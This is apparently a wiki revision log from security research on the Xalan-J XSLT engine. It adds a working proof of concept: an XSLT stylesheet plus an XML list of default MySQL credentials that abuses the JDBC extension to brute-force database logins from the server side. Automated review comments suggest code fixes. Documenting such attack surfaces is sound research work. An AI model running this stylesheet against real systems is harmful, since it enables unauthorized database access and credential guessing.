Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version 62.1
edited by Nicolas Gregoire
on 2012/01/12 22:13
Change comment: Upload new attachment xalanj-jdbc-query.xsl
To version 63.1
edited by Nicolas Gregoire
on 2012/01/12 22:14
Change comment: There is no comment for this version

Page properties
Content
... ... @@ -66,12 +66,16 @@
66 66  
67 67  == JDBC connectivity ==
68 68  
69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
69 +It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver.
70 70  
71 +=== Simple connection ===
72 +
73 +The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
74 +
71 71  |=Namespace|=Extension function|=PoC
72 72  |org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]]
73 73  
74 -=== Brute-force ===
78 +=== Credentials brute-forcing ===
75 75  
76 76  The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-).
77 77  
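Review bot: The table kept under the new "Simple connection" heading (lines 75-76 of the new version) only lists xalanj-jdbc-query.xsl, although the brute-force stylesheet attached in this same revision uses the same org.apache.xalan.lib.sql.XConnection namespace with new() and query(). Either add a row for xalanj-jdbc-bruteforce.xsl or move the table up under "JDBC connectivity" so it covers both subsections. Since the heading directly above it is being renamed, the untouched paragraph at line 76 could also be corrected in the same edit: "passsword" should be "password" and "a XML file" should be "an XML file".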
xalanj-jdbc-bruteforce.xml
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +775 bytes
Content
... ... @@ -1,0 +1,35 @@
1 +<data>
2 + <foobar>
3 + <DBINFO>
4 + <dbdriver>com.mysql.jdbc.Driver</dbdriver>
5 + <dburl>jdbc:mysql://localhost/</dburl>
6 + <user>root</user>
7 + <password></password>
8 + </DBINFO>
9 + </foobar>
10 + <foobar>
11 + <DBINFO>
12 + <dbdriver>com.mysql.jdbc.Driver</dbdriver>
13 + <dburl>jdbc:mysql://localhost/</dburl>
14 + <user>root</user>
15 + <password>uberpasswd</password>
16 + </DBINFO>
17 + </foobar>
18 + <foobar>
19 + <DBINFO>
20 + <dbdriver>com.mysql.jdbc.Driver</dbdriver>
21 + <dburl>jdbc:mysql://localhost/</dburl>
22 + <user>root</user>
23 + <password>cnam</password>
24 + </DBINFO>
25 + </foobar>
26 + <foobar>
27 + <DBINFO>
28 + <dbdriver>com.mysql.jdbc.Driver</dbdriver>
29 + <dburl>jdbc:mysql://localhost/</dburl>
30 + <user>pma</user>
31 + <password>pma</password>
32 + </DBINFO>
33 + </foobar>
34 +</data>
35 +
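Review bot: The wrapper element foobar around each DBINFO (lines 2, 10, 18 and 26) is a placeholder name that the stylesheet's for-each select="foobar" depends on, so the data format is not self-describing. Rename it to something that says what a record is (for example "candidate") in both attachments at once, and add an XML declaration on line 1 to match the .xsl file. The dbdriver and dburl values are repeated identically in all four tuples; a short comment stating that they are allowed to differ per tuple would explain why they are not factored out.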
xalanj-jdbc-bruteforce.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +979 bytes
Content
... ... @@ -1,0 +1,29 @@
1 +<?xml version="1.0"?>
2 +
3 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
4 + version="1.0"
5 + xmlns:sql="org.apache.xalan.lib.sql.XConnection"
6 + extension-element-prefixes="sql">
7 +
8 +<xsl:output method="text" indent="yes"/>
9 +<xsl:variable name="query">SELECT "OK !!"</xsl:variable>
10 +
11 +<xsl:template match="//data">
12 + <xsl:for-each select="foobar">
13 +
14 + <xsl:variable name="cinfo" select="DBINFO"/>
15 + <xsl:variable name="user" select="DBINFO/user/text()"/>
16 + <xsl:variable name="passwd" select="DBINFO/password/text()"/>
17 +
18 + <xsl:variable name="db" select="sql:new($cinfo)"/>
19 + <xsl:variable name="data" select='sql:query($db, $query)'/>
20 +
21 + <xsl:copy-of select="concat('Username : [', $user, '] / ')" />
22 + <xsl:copy-of select="concat('Password : [', $passwd, '] : ')" />
23 + <xsl:copy-of select="$data" /><xsl:copy-of select="'&#x0A;'" />
24 +
25 + </xsl:for-each>
26 +</xsl:template>
27 +
28 +</xsl:stylesheet>
29 +
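Review bot: The for-each body (lines 12-25) opens a connection with sql:new($cinfo) for every tuple but never closes it, although the page's own table lists close() among the XConnection functions used by the query PoC. Add a close call on $db after the result is copied at line 23 so that connections do not accumulate across iterations. Two smaller points: indent="yes" on line 8 has no effect with method="text" and can be dropped, and the match pattern "//data" on line 11 can be written as "data", since a match pattern already applies at any depth. The stylesheet also does not document what $data contains when a login fails, so a reader cannot tell a failed tuple from a successful one without running it; a comment describing the expected output for both cases would help.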